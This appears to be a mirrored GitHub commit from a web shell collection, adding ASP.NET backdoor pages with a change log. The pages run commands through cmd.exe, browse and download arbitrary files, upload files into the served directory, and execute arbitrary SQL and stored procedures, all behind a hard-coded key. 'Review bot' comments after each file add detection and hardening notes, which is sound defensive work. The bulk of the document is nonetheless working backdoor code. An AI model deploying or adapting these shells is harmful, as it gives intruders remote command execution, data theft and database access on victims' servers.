mirror of https://github.com/tennc/webshell.git synced 2026-02-16 02:16:38 +00:00

add some webshell

tennc
2014-05-19 09:10:17 +08:00
parent a7d2684ed0
commit 8870eb9484
24 changed files with 12299 additions and 0 deletions


@@ -0,0 +1,52 @@
ASP.NET Backdoors
Copyright (c) 2012 woanware
Developed by Mark Woan (markwoan[at]gmail.com)
---------------------------------------------------------------------------
Change Log
----------
v1.3.0
------
- Added an auth key parameter, so that you can password protect each of the
pages. Modify the constant located at the top of each file. The
filesystembrowser.aspx file needs you to initially specify the "authkey=XXX"
parameter value
v1.2.0
------
- Added spexec.aspx allows you to dynamically load SQL Server stored
procedures and associated parameters, then execute the SP
v1.1.0
------
- Added sql.aspx which allows you to execute SQL statements
v1.0.2
------
- MikeA has kindly modified filesystembrowser.aspx and fileupload.aspx so that
if the application renames the files on upload, the functionality still
works, since I had hardcoded the filenames
v1.0.1
------
- Added extra validation to filesystembrowser.aspx to catch errors when
assigning a default drive. Thanks foob for the feedback
v1.0.0
------
- Initial Public Release
---------------------------------------------------------------------------
woanware
http://www.woanware.co.uk/


@@ -0,0 +1,96 @@
<%@ Page Language="C#" %>
<%@ Import namespace="System.Diagnostics"%>
<%@ Import Namespace="System.IO" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script runat="server">
private const string AUTHKEY = "woanware";
private const string HEADER = "<html>\n<head>\n<title>command</title>\n<style type=\"text/css\"><!--\nbody,table,p,pre,form input,form select {\n font-family: \"Lucida Console\", monospace;\n font-size: 88%;\n}\n-->\n</style></head>\n<body>\n";
private const string FOOTER = "</body>\n</html>\n";
/// <summary>
///
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
protected void Page_Load(object sender, EventArgs e)
{
}
/// <summary>
///
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
protected void btnExecute_Click(object sender, EventArgs e)
{
if (txtAuthKey.Text != AUTHKEY)
{
return;
}
Response.Write(HEADER);
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(this.ExecuteCommand(txtCommand.Text)));
Response.Write("</pre>");
Response.Write(FOOTER);
}
/// <summary>
///
/// </summary>
/// <param name="command"></param>
/// <returns></returns>
private string ExecuteCommand(string command)
{
try
{
ProcessStartInfo processStartInfo = new ProcessStartInfo();
processStartInfo.FileName = "cmd.exe";
processStartInfo.Arguments = "/c " + command;
processStartInfo.RedirectStandardOutput = true;
processStartInfo.UseShellExecute = false;
Process process = Process.Start(processStartInfo);
using (StreamReader streamReader = process.StandardOutput)
{
string ret = streamReader.ReadToEnd();
return ret;
}
}
catch (Exception ex)
{
return ex.ToString();
}
}
</script>
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1" runat="server">
<title>Command</title>
</head>
<body>
<form id="formCommand" runat="server">
<div>
<table>
<tr>
<td width="30">Auth Key:</td>
<td><asp:TextBox id="txtAuthKey" runat="server"></asp:TextBox></td>
</tr>
<tr>
<td width="30">Command:</td>
<td><asp:TextBox ID="txtCommand" runat="server" Width="820px"></asp:TextBox></td>
</tr>
<td>&nbsp;</td>
<td><asp:Button ID="btnExecute" runat="server" OnClick="btnExecute_Click" Text="Execute" /></td>
</tr>
</table>
</div>
</form>
</body>
</html>
<!-- Created by Mark Woan (http://www.woanware.co.uk) -->
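Review bot: Nothing in this file says what it is: the `<summary>` blocks above `btnExecute_Click` and `ExecuteCommand` are empty, and the only description lives in the separate change log. For a sample kept in a research corpus I would put `<%-- Web shell sample: passes txtCommand.Text to "cmd.exe /c" and returns stdout; for detection work only --%>` at the top and give `ExecuteCommand` the summary `/// Starts cmd.exe /c <command> and returns its standard output, or the exception text on failure.` Two properties of the code as written are useful to defenders: the `Process.Start` of `cmd.exe` runs as a child of the web application's worker process, which is an uncommon parent for a shell, and the `AUTHKEY` constant carries the same default value `"woanware"` here and in the four other pages of this commit, so it works as a static content signature. The request is a Web Forms postback, which by default is a POST, so the command text sits in the request body and access logs alone are unlikely to show it.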


@@ -0,0 +1,207 @@
<%@ Page Language="C#" %>
<%@ Import namespace="System.Diagnostics"%>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Text" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script language="c#" runat="server">
private const string AUTHKEY = "woanware";
private const string HEADER = "<html>\n<head>\n<title>filesystembrowser</title>\n<style type=\"text/css\"><!--\nbody,table,p,pre,form input,form select {\n font-family: \"Lucida Console\", monospace;\n font-size: 88%;\n}\n-->\n</style></head>\n<body>\n";
private const string FOOTER = "</body>\n</html>\n";
/// <summary>
///
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
protected void Page_Load(object sender, EventArgs e)
{
try
{
if (Request.Params["authkey"] == null)
{
return;
}
if (Request.Params["authkey"] != AUTHKEY)
{
return;
}
if (Request.Params["operation"] != null)
{
if (Request.Params["operation"] == "download")
{
Response.Write(HEADER);
Response.Write(this.DownloadFile());
Response.Write(FOOTER);
}
else if (Request.Params["operation"] == "list")
{
Response.Write(HEADER);
Response.Write(this.OutputList());
Response.Write(FOOTER);
}
else
{
Response.Write(HEADER);
Response.Write("Unknown operation");
Response.Write(FOOTER);
}
}
else
{
Response.Write(HEADER);
Response.Write(this.OutputList());
Response.Write(FOOTER);
}
}
catch (Exception ex)
{
Response.Write(HEADER);
Response.Write(ex.Message);
Response.Write(FOOTER);
}
}
/// <summary>
///
/// </summary>
private string DownloadFile()
{
try
{
if (Request.Params["file"] == null)
{
return "No file supplied";
}
string file = Request.Params["file"];
if (File.Exists(file) == false)
{
return "File does not exist";
}
Response.ClearContent();
Response.ClearHeaders();
Response.Clear();
Response.ContentType = "application/octet-stream";
Response.AddHeader("Content-Disposition", "attachment; filename=" + Path.GetFileName(file));
Response.AddHeader("Content-Length", new FileInfo(file).Length.ToString());
Response.WriteFile(file);
Response.Flush();
Response.Close();
return "File downloaded";
}
catch (Exception ex)
{
return ex.ToString();
}
}
/// <summary>
///
/// </summary>
private string OutputList()
{
try
{
StringBuilder response = new StringBuilder();
string dir = string.Empty;
if (Request.Params["directory"] == null)
{
string[] tempDrives = Environment.GetLogicalDrives();
if (tempDrives.Length > 0)
{
for (int index = 0; index < tempDrives.Length; index++)
{
try
{
dir = tempDrives[index];
break;
}
catch (IOException){}
}
}
}
else
{
dir = Request.Params["directory"];
}
if (Directory.Exists(dir) == false)
{
return "Directory does not exist";
}
// Output the auth key textbox
response.Append("<table><tr>");
response.Append(@"<td><asp:TextBox id=""txtAuthKey"" runat=""server""></asp:TextBox></td>");
response.Append("</tr><tr><td>&nbsp;<td></tr></table>");
// Output the available drives
response.Append("<table><tr>");
response.Append("<td>Drives</td>");
string[] drives = Environment.GetLogicalDrives();
foreach (string drive in drives)
{
response.Append("<td><a href=");
response.Append("?directory=");
response.Append(drive);
response.Append("&authkey=" + Request.Params["authkey"]);
response.Append("&operation=list>");
response.Append(drive);
response.Append("</a></td>");
}
// Output the current path
response.Append("</tr></table><table><tr><td>&nbsp;</td></tr>");
response.Append("<tr><td>..&nbsp;&nbsp;&nbsp;<a href=\"?directory=");
string parent = dir;
DirectoryInfo parentDirInfo = Directory.GetParent(dir);
if (parentDirInfo != null)
{
parent = parentDirInfo.FullName;
}
response.Append(parent);
response.Append("&authkey=" + Request.Params["authkey"]);
response.Append("&operation=list\">");
response.Append(parent);
response.Append("</a></td></tr></table><table>");
// Output the directories
System.IO.DirectoryInfo dirInfo = new System.IO.DirectoryInfo(dir);
foreach (System.IO.DirectoryInfo dirs in dirInfo.GetDirectories("*.*"))
{
response.Append("<tr><td>dir&nbsp;&nbsp;<a href=\"?directory=" + dirs.FullName + "&authkey=" + Request.Params["authkey"] + "&operation=list\">" + dirs.FullName + "</a></td></tr>");
}
// Output the files
dirInfo = new System.IO.DirectoryInfo(dir);
foreach (System.IO.FileInfo fileInfo in dirInfo.GetFiles("*.*"))
{
response.Append("<tr><td>file&nbsp;<a href=\"?file=" + fileInfo.FullName + "&authkey=" + Request.Params["authkey"] + "&operation=download\">" + fileInfo.FullName + "</a></td><td>");
response.Append(fileInfo.Length);
response.Append("</td></tr>");
}
response.Append("</table>");
return response.ToString();
}
catch (Exception ex)
{
return ex.ToString();
}
}
</script>
<!-- Created by Mark Woan (http://www.woanware.co.uk) -->
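Review bot: `Page_Load` takes `authkey`, `operation`, `directory` and `file` from `Request.Params`, and `OutputList` writes the key back into every link it generates (the `"&authkey=" + Request.Params["authkey"]` appends), but none of this is documented; the summaries on `Page_Load`, `DownloadFile` and `OutputList` are empty. I would add above `Page_Load` a comment such as `// Parameters: authkey (must equal AUTHKEY), operation=list|download, directory, file; read from Request.Params and echoed into generated links`. Because the generated links are plain GET URLs, the key and the browsed paths end up in the web server's access log (and possibly in Referer headers), so a log search for `authkey=` together with `operation=list` or `operation=download` is a practical way to find use of this page. `DownloadFile` passes `file` to `Response.WriteFile` with no restriction on location, so what can be read is bounded only by the file-system rights of the web application's identity, which is where the mitigation sits.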


@@ -0,0 +1,126 @@
<%@ Page Language="C#" %>
<%@ Import Namespace="System.IO" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script runat="server">
private const string AUTHKEY = "woanware";
private const string HEADER = "<html>\n<head>\n<title>filesystembrowser</title>\n<style type=\"text/css\"><!--\nbody,table,p,pre,form input,form select {\n font-family: \"Lucida Console\", monospace;\n font-size: 88%;\n}\n-->\n</style></head>\n<body>\n";
private const string FOOTER = "</body>\n</html>\n";
/// <summary>
///
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
protected void Page_Load(object sender, EventArgs e)
{
try
{
if (Request.Params["authkey"] == null)
{
Response.Write(HEADER);
Response.Write(this.GetUploadControls());
Response.Write(FOOTER);
return;
}
if (Request.Params["authkey"] != AUTHKEY)
{
Response.Write(HEADER);
Response.Write(this.GetUploadControls());
Response.Write(FOOTER);
return;
}
if (Request.Params["operation"] != null)
{
if (Request.Params["operation"] == "upload")
{
Response.Write(HEADER);
Response.Write(this.UploadFile());
Response.Write(FOOTER);
}
else
{
Response.Write(HEADER);
Response.Write("Unknown operation");
Response.Write(FOOTER);
}
}
else
{
Response.Write(HEADER);
Response.Write(this.GetUploadControls());
Response.Write(FOOTER);
}
}
catch (Exception ex)
{
Response.Write(HEADER);
Response.Write(ex.Message);
Response.Write(FOOTER);
}
}
/// <summary>
///
/// </summary>
private string UploadFile()
{
try
{
if (Request.Params["authkey"] == null)
{
return string.Empty;
}
if (Request.Params["authkey"] != AUTHKEY)
{
return string.Empty;
}
if (Request.Files.Count != 1)
{
return "No file selected";
}
HttpPostedFile httpPostedFile = Request.Files[0];
int fileLength = httpPostedFile.ContentLength;
byte[] buffer = new byte[fileLength];
httpPostedFile.InputStream.Read(buffer, 0, fileLength);
FileInfo fileInfo = new FileInfo(Request.PhysicalPath);
using (FileStream fileStream = new FileStream(Path.Combine(fileInfo.DirectoryName, Path.GetFileName(httpPostedFile.FileName)), FileMode.Create))
{
fileStream.Write(buffer, 0, buffer.Length);
}
return "File uploaded";
}
catch (Exception ex)
{
return ex.ToString();
}
}
/// <summary>
///
/// </summary>
/// <returns></returns>
private string GetUploadControls()
{
string temp = string.Empty;
temp = "<form enctype=\"multipart/form-data\" action=\"?operation=upload\" method=\"post\">";
temp += "<br>Auth Key: <input type=\"text\" name=\"authKey\"><br>";
temp += "<br>Please specify a file: <input type=\"file\" name=\"file\"></br>";
temp += "<div><input type=\"submit\" value=\"Send\"></div>";
temp += "</form>";
return temp;
}
</script>
<!-- Created by Mark Woan (http://www.woanware.co.uk) -->
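Review bot: `UploadFile` has an empty summary, and where the file lands is easy to miss: it is written with `FileMode.Create` into the directory of `Request.PhysicalPath`, i.e. next to this page inside the served content, under `Path.GetFileName(httpPostedFile.FileName)`. I would document that with `/// Saves the single posted file into this page's own directory under its client-supplied base name, replacing any existing file of that name.` The defensive consequences follow directly: the web application's identity should not hold write permission on directories it serves, and file-creation monitoring on those directories catches the write. As a smaller point, `HEADER` still carries the title `filesystembrowser`, apparently copied from the browser page, which is worth knowing when writing content signatures.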


@@ -0,0 +1,367 @@
<%@ Page Language="C#" %>
<%@ Import namespace="System.Data"%>
<%@ Import namespace="System.Data.SqlClient"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script runat="server" language="c#">
private const string AUTHKEY = "woanware";
/// <summary>
///
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
protected void btnLogin_Click(object sender, EventArgs e)
{
SqlConnection sqlConnection = null;
try
{
if (txtAuthKey.Text != AUTHKEY)
{
return;
}
sqlConnection = new SqlConnection();
sqlConnection.ConnectionString = "Data source=" + txtDatabaseServer.Text +
";User id=" + txtUserId.Text +
";Password=" + txtPassword.Text +
";Initial catalog=" + txtDatabase.Text;
sqlConnection.Open();
SqlCommand sqlCommand = null;
SqlDataAdapter sqlDataAdapter = null;
sqlCommand = new SqlCommand("sp_stored_procedures", sqlConnection);
sqlCommand.CommandType = CommandType.StoredProcedure;
sqlDataAdapter = new SqlDataAdapter(sqlCommand);
lblStatus.Text = string.Empty;
DataSet dataSet = new DataSet();
sqlDataAdapter.Fill(dataSet, "SPs");
cboSps.DataSource = dataSet.Tables["SPs"];
cboSps.DataTextField = "PROCEDURE_NAME";
cboSps.DataBind();
}
catch (SqlException sqlEx)
{
lblStatus.Text = sqlEx.Message;
}
catch (Exception ex)
{
lblStatus.Text = ex.Message;
}
finally
{
if (sqlConnection != null)
{
sqlConnection.Dispose();
}
}
}
/// <summary>
///
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
protected void btnGetParameters_Click(object sender, EventArgs e)
{
SqlConnection sqlConnection = null;
try
{
if (txtAuthKey.Text != AUTHKEY)
{
return;
}
sqlConnection = new SqlConnection();
sqlConnection.ConnectionString = "Data source=" + txtDatabaseServer.Text +
";User id=" + txtUserId.Text +
";Password=" + txtPassword.Text +
";Initial catalog=" + txtDatabase.Text;
SqlCommand sqlCommand = new SqlCommand("sp_sproc_columns", sqlConnection);
sqlCommand.CommandType = CommandType.StoredProcedure;
SqlDataAdapter sqlDataAdapter = new SqlDataAdapter(sqlCommand);
lblStatus.Text = string.Empty;
sqlCommand.CommandType = CommandType.StoredProcedure;
sqlCommand.Parameters.Add("@procedure_name", SqlDbType.NVarChar, 390).Value = cboSps.SelectedItem.Value;
DataSet dataSet = new DataSet();
sqlDataAdapter.Fill(dataSet, "Parameters");
gridParameters.DataSource = dataSet.Tables["Parameters"];
gridParameters.DataBind();
gridResults.Visible = false;
}
catch (SqlException sqlEx)
{
lblStatus.Text = sqlEx.Message;
}
finally
{
if (sqlConnection != null)
{
sqlConnection.Dispose();
}
}
}
/// <summary>
///
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
protected void btnExecute_Click(object sender, EventArgs e)
{
SqlConnection sqlConnection = null;
try
{
if (txtAuthKey.Text != AUTHKEY)
{
return;
}
sqlConnection = new SqlConnection();
sqlConnection.ConnectionString = "Data source=" + txtDatabaseServer.Text +
";User id=" + txtUserId.Text +
";Password=" + txtPassword.Text +
";Initial catalog=" + txtDatabase.Text;
DataSet dataSet = new DataSet();
SqlCommand sqlCommand = new SqlCommand(cboSps.SelectedItem.Value, sqlConnection);
SqlDataAdapter sqlDataAdapter = new SqlDataAdapter(sqlCommand);
lblStatus.Text = string.Empty;
sqlCommand.CommandType = CommandType.StoredProcedure;
this.AddParameters(sqlCommand);
sqlDataAdapter.Fill(dataSet, "Results");
this.UpdateParameters(sqlCommand);
gridResults.DataSource = dataSet.Tables["Results"];
gridResults.DataBind();
gridResults.Visible = true;
}
catch (SqlException sqlEx)
{
lblStatus.Text = sqlEx.Message;
}
finally
{
if (sqlConnection != null)
{
sqlConnection.Dispose();
}
}
}
/// <summary>
///
/// </summary>
/// <param name="sqlCommand"></param>
private void AddParameters(SqlCommand sqlCommand)
{
foreach (DataGridItem dataGridItem in gridParameters.Items)
{
if (((TableCell)dataGridItem.Controls[5]).Text != "5")
{
switch (((TableCell)dataGridItem.Controls[1]).Text.ToLower())
{
case "bit":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.Bit).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "bigint":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.BigInt).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "char":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.Char, int.Parse(((TableCell)dataGridItem.Controls[2]).Text)).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "datetime":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.DateTime).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "decimal":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.Decimal).Value = decimal.Parse(((TextBox)dataGridItem.Controls[6].Controls[1]).Text);
break;
case "float":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.Float).Value = float.Parse(((TextBox)dataGridItem.Controls[6].Controls[1]).Text);
break;
case "int":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.Int).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "nchar":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.NChar).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "ntext":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.NText, int.Parse(((TableCell)dataGridItem.Controls[2]).Text)).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "nvarchar":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.NVarChar, int.Parse(((TableCell)dataGridItem.Controls[2]).Text)).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "real":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.Real).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "smallint":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.SmallInt).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
case "tinyint":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.TinyInt).Value = uint.Parse(((TextBox)dataGridItem.Controls[6].Controls[1]).Text);
break;
case "varchar":
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.VarChar, int.Parse(((TableCell)dataGridItem.Controls[2]).Text)).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
break;
default:
continue;
}
}
if (((TableCell)dataGridItem.Controls[5]).Text == "2")
{
sqlCommand.Parameters[((TableCell)dataGridItem.Controls[0]).Text].Direction = ParameterDirection.InputOutput;
}
}
}
/// <summary>
///
/// </summary>
/// <param name="sqlCommand"></param>
private void UpdateParameters(SqlCommand sqlCommand)
{
foreach (DataGridItem dataGridItem in gridParameters.Items)
{
if (((TableCell)dataGridItem.Controls[5]).Text != "5")
{
((TableCell)dataGridItem.Controls[7]).Text = sqlCommand.Parameters[((TableCell)dataGridItem.Controls[0]).Text].Value.ToString();
}
}
}
</script>
<html xmlns="http://www.w3.org/1999/xhtml" >
<head runat="server">
<title>Stored Procedure Execute</title>
<style type="text/css"><!--body,table,p,pre,form input,form select {font-family: "Lucida Console", monospace; font-size: 88%;}--></style>
</head>
<body>
<form id="form1" runat="server">
<table>
<tbody>
<tr>
<td>
Key:</td>
<td>
<asp:TextBox id="txtAuthKey" runat="server"></asp:TextBox>
</td>
</tr>
<tr>
<td>
Database server:</td>
<td>
<asp:TextBox id="txtDatabaseServer" runat="server"></asp:TextBox>
</td>
</tr>
<tr>
<td>
User id:</td>
<td>
<asp:TextBox id="txtUserId" runat="server"></asp:TextBox>
</td>
</tr>
<tr>
<td>
Password:</td>
<td>
<asp:TextBox id="txtPassword" runat="server"></asp:TextBox>
</td>
</tr>
<tr>
<td>
Database:</td>
<td>
<asp:TextBox id="txtDatabase" runat="server"></asp:TextBox>
</td>
</tr>
<tr>
<td>
</td>
<td>
<asp:Button id="btnLogin" onclick="btnLogin_Click" runat="server" Text="Login"></asp:Button>
</td>
</tr>
<tr>
<td>
Stored procedures:</td>
<td>
<asp:DropDownList id="cboSps" runat="server"></asp:DropDownList>
</td>
</tr>
<tr>
<td>
</td>
<td>
<p>
<asp:Button id="btnGetParams" onclick="btnGetParameters_Click" runat="server" Text="Get Parameters"></asp:Button>
<asp:Button id="btnExecute" onclick="btnExecute_Click" runat="server" Text="Execute Query"></asp:Button>
</p>
</td>
</tr>
<tr>
<td>
Status:</td>
<td>
<asp:Label id="lblStatus" runat="server"></asp:Label></td>
</tr>
</tbody>
</table>
<p>
<asp:DataGrid id="gridParameters" runat="server" AutoGenerateColumns="False">
<Columns>
<asp:BoundColumn DataField="column_name" HeaderText="Name"></asp:BoundColumn>
<asp:BoundColumn DataField="type_name" HeaderText="Type"></asp:BoundColumn>
<asp:BoundColumn DataField="length" HeaderText="Length"></asp:BoundColumn>
<asp:BoundColumn DataField="precision" HeaderText="Precision"></asp:BoundColumn>
<asp:BoundColumn DataField="scale" HeaderText="Scale"></asp:BoundColumn>
<asp:BoundColumn DataField="column_type" HeaderText="Column Type"></asp:BoundColumn>
<asp:TemplateColumn HeaderText="Input Value">
<ItemTemplate>
<asp:TextBox ID="TextBox1" runat="server"></asp:TextBox>
</ItemTemplate>
</asp:TemplateColumn>
<asp:BoundColumn HeaderText="Output Value"></asp:BoundColumn>
</Columns>
</asp:DataGrid>
</p>
<p>
<asp:DataGrid id="gridResults" runat="server"></asp:DataGrid>
</p>
<p>
</p>
<p>
<a href="spexec.aspx">Restart</a>
</p>
</form>
</body>
</html>
<!-- Created by Mark Woan (http://www.woanware.co.uk) -->
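Review bot: The three click handlers each build the connection string by concatenating `txtDatabaseServer`, `txtUserId`, `txtPassword` and `txtDatabase`, and none of them has a filled-in summary saying so. I would document `btnLogin_Click` with `/// Connects to the SQL Server named in the text boxes and fills cboSps from sp_stored_procedures.` and the other two along the same lines (`sp_sproc_columns` for the parameter list, the selected procedure run as `CommandType.StoredProcedure` for execution). For defenders the point is that the server and credentials come from the request rather than from application configuration, so the page lets the web host reach any SQL Server it can route to; restricting outbound database traffic from the web tier and alerting on logins from the web host under accounts the application does not use both apply. `btnGetParameters_Click` and `btnExecute_Click` catch only `SqlException`, unlike `btnLogin_Click`, so other failures are left to the framework's error handling and may show up in application error logs.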


@@ -0,0 +1,104 @@
<%@ Page Language="C#" %>
<%@ Import namespace="System.Data"%>
<%@ Import namespace="System.Data.SqlClient"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script runat="server" language="c#">
private const string AUTHKEY = "woanware";
/// <summary>
///
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
protected void btnExecute_Click(object sender, EventArgs e)
{
SqlConnection sqlConnection = null;
try
{
if (txtAuthKey.Text != AUTHKEY)
{
return;
}
sqlConnection = new SqlConnection();
sqlConnection.ConnectionString = txtConnection.Text;
sqlConnection.Open();
SqlCommand sqlCommand = null;
SqlDataReader sqlDataReader = null;
sqlCommand = new SqlCommand(txtSql.Text, sqlConnection);
sqlCommand.CommandType = CommandType.Text;
sqlDataReader = sqlCommand.ExecuteReader();
StringBuilder output = new StringBuilder();
output.Append("<table width=\"100%\" border=\"1\">");
while (sqlDataReader.Read())
{
output.Append("<tr>");
int colCount = sqlDataReader.FieldCount;
for (int index = 0; index < colCount; index++)
{
output.Append("<td>");
output.Append(sqlDataReader[index].ToString());
output.Append("</td>");
}
output.Append("</tr>");
output.Append(Environment.NewLine);
}
output.Append("</table>");
Literal1.Text = output.ToString();
}
catch (SqlException sqlEx)
{
Response.Write(sqlEx.ToString());
}
catch (Exception ex)
{
Response.Write(ex.ToString());
}
finally
{
if (sqlConnection != null)
{
sqlConnection.Dispose();
}
}
}
</script>
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1" runat="server">
<title>SQL</title>
<style type="text/css"><!--body,table,p,pre,form input,form select {font-family: "Lucida Console", monospace; font-size: 88%;}--></style>
</head>
<body>
<form id="formSql" runat="server">
<div>
<table width="100%">
<tr><td width="30">Auth Key:</td><td><asp:TextBox ID="txtAuthKey" runat="server" Height="15px" Width="100%"></asp:TextBox></td></tr>
<tr><td>Connection:</td><td><asp:TextBox ID="txtConnection" runat="server" Height="15px" Width="100%"></asp:TextBox></td></tr>
<tr><td>SQL:</td><td><asp:TextBox ID="txtSql" runat="server" Height="258px" Width="100%"></asp:TextBox></td></tr>
<tr><td>&nbsp;</td><td><asp:Button ID="btnExecute" runat="server" OnClick="btnExecute_Click" Text="Execute" /></td></tr>
<tr><td colspan="2"><asp:Literal ID="Literal1" runat="server"></asp:Literal></td></tr>
</table>
</div>
</form>
</body>
</html>
<!-- Created by Mark Woan (http://www.woanware.co.uk) -->
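Review bot: `btnExecute_Click` has an empty summary although it is the whole page: it opens `txtConnection.Text` as the connection string and runs `txtSql.Text` as `CommandType.Text`. I would write `/// Executes the SQL in txtSql over the connection string in txtConnection and renders the rows as an HTML table in Literal1.` Note also that `sqlDataReader[index].ToString()` is appended to the table without `Server.HtmlEncode`, unlike the command page in this commit, so anyone opening this output, including an analyst reproducing it in a lab, gets database content interpreted as markup. What the statement can do is limited only by the database account supplied, so least-privilege database logins and separation between the web tier and database servers are the relevant controls.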

1689
aspx/wso.aspx Normal file

File diff suppressed because it is too large Load Diff